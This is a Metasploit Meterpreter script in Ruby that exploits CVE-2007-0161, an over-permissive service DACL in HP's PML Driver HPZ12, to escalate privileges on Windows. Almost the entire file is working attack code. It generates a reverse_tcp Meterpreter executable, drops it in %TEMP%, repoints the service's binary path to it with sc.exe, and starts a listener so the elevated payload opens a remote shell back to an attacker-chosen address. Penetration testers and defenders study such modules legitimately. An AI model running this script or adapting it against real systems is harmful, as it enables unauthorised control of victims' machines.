# $Id$
# $Revision$
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
# HP Multiple Products PML Driver HPZ12 Local Privilege Escalation.
#
#  This module exploits a privilege escalation vulnerability in
#  Hewlett-Packard's PML Driver HPZ12. The service's DACL grants
#  SERVICE_CHANGE_CONFIG too broadly, so a local attacker can repoint
#  the service's image path at a binary of their choosing and have it
#  run with the service's (elevated) privileges.
#
#  BID - 21935
#  CVE - 2007-0161
#  mc[@]metasploit.com
##
#
# Options
#
# -h  print usage and exit
# -r  address the reverse connection calls back to (defaults to the local
#     source address)
# -p  port the reverse connection calls back to (defaults to 4444)
#
option_table = {
        "-h" => [ false, "This help menu" ],
        "-r" => [ true,  "The IP of the system running Metasploit listening for the connect back" ],
        "-p" => [ true,  "The port on the remote host where Metasploit is listening" ]
}
opts = Rex::Parser::Arguments.new(option_table)
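#
# Default parameters
#
rhost = Rex::Socket.source_address("1.2.3.4")
rport = 4444

#
# Option parsing
#
# -r/-p are copied straight into the payload and handler datastore, so reject
# values that would only fail later (e.g. "-p abc" silently becoming LPORT 0
# through to_i).
opts.parse(args) do |opt, idx, val|
        case opt
        when "-h"
                print_status("HP PML Driver HPZ12 SERVICE_CHANGE_CONFIG privilege escalation.")
                print_line(opts.usage)
                raise Rex::Script::Completed
        when "-r"
                if val.to_s.strip.empty?
                        print_error("-r requires a host address")
                        raise Rex::Script::Completed
                end
                rhost = val
        when "-p"
                port = val.to_i
                unless val.to_s =~ /\A\d+\z/ && port.between?(1, 65535)
                        print_error("-p requires a port number between 1 and 65535, got '#{val}'")
                        raise Rex::Script::Completed
                end
                rport = port
        end
end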
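# Only a Windows Meterpreter can drive the service control manager.
unless client.platform =~ /win32|win64/
        print_error("This version of Meterpreter is not supported with this Script!")
        raise Rex::Script::Completed
end

service = "Pml Driver HPZ12"
# Image path the HP installer sets; used only if `sc qc` cannot be parsed.
default_binpath = "%SystemRoot%\\system32\\HPZipm12.exe"

# Run a command hidden under cmd.exe, block until it exits and return its
# output.  process.execute() returns as soon as the process is spawned, so
# firing stop/config/start back-to-back (as this script used to) let the three
# sc.exe invocations race each other; draining the channel serialises them and
# lets us inspect sc's status text.
run_cmd = lambda do |cmd|
        child = client.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
        out = ""
        while (chunk = child.channel.read)
                break if chunk == ""
                out << chunk
        end
        child.channel.close
        child.close
        out
end

# The script keys off the driver's helper process being alive; report when it
# is not instead of silently doing nothing.
target = client.sys.process.get_processes().find { |m| m['name'] =~ /HPZipm12\.exe/i }
unless target
        print_error("HPZipm12.exe is not running; is the HP PML driver installed?")
        raise Rex::Script::Completed
end
print_status("Found vulnerable process #{target['name']} with pid #{target['pid']}.")

# Build the EXE payload.
pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
pay.datastore['LHOST'] = rhost
pay.datastore['LPORT'] = rport
raw = pay.generate
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)

# Drop the EXE in %TEMP% under a random name.  It is NOT deleted on success
# (the new session executes from it), so remove it once that session is done.
tempdir = client.fs.file.expand_path("%TEMP%")
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
print_status("Sending EXE payload '#{tempexe}'.")
fd = client.fs.file.new(tempexe, "wb")
begin
        fd.write(exe)
ensure
        fd.close
end

# Read back the current image path so we restore what was really configured
# rather than assuming the stock location.  sc qc prints a line of the form
# "BINARY_PATH_NAME   : C:\...\HPZipm12.exe"; surrounding quotes are stripped
# because we re-quote the path when restoring it.
orig_binpath = default_binpath
if run_cmd.call("sc qc \"#{service}\"") =~ /BINARY_PATH_NAME\s*:\s*(.+?)\s*$/
        orig_binpath = Regexp.last_match(1).gsub(/\A"|"\z/, '')
end

print_status("Stopping service \"#{service}\"...")
run_cmd.call("sc stop \"#{service}\"")

print_status("Setting #{service} to #{tempexe}...")
# binpath is quoted because sc stores it verbatim and %TEMP% may contain spaces.
out = run_cmd.call("sc config \"#{service}\" binpath= \"#{tempexe}\"")
# sc.exe reports e.g. "[SC] OpenService FAILED 5: Access is denied." when the
# DACL does not actually grant SERVICE_CHANGE_CONFIG -- bail out instead of
# restarting the legitimate driver for nothing.  (This matches sc's English
# status text; loosen it if a localised sc.exe turns out to differ.)
if out =~ /FAILED/
        print_error("sc config failed, service left unchanged: #{out.strip}")
        client.fs.file.rm(tempexe)
        raise Rex::Script::Completed
end

# Start the listener BEFORE the service: the reverse_tcp stager connects back
# as soon as the service process runs, and a refused connection leaves nothing
# but a dead service process.
handler = client.framework.exploits.create("multi/handler")
handler.datastore['WORKSPACE']     = client.workspace
handler.datastore['PAYLOAD']       = "windows/meterpreter/reverse_tcp"
handler.datastore['LHOST']         = rhost
handler.datastore['LPORT']         = rport
handler.datastore['ExitOnSession'] = false
handler.exploit_simple(
        'Payload'  => handler.datastore['PAYLOAD'],
        'RunAsJob' => true
)
sleep(1) # let the job bind its socket before we trigger the callback

print_status("Restarting the \"#{service}\" service...")
# NOTE(review): the payload EXE is not a real service binary, so sc start may
# block until the SCM's start timeout expires and the SCM may then terminate
# the process; migrate out of it promptly once the session arrives.
run_cmd.call("sc start \"#{service}\"")

print_status("Restoring \"#{service}\" image path to #{orig_binpath}...")
run_cmd.call("sc config \"#{service}\" binpath= \"#{orig_binpath}\"")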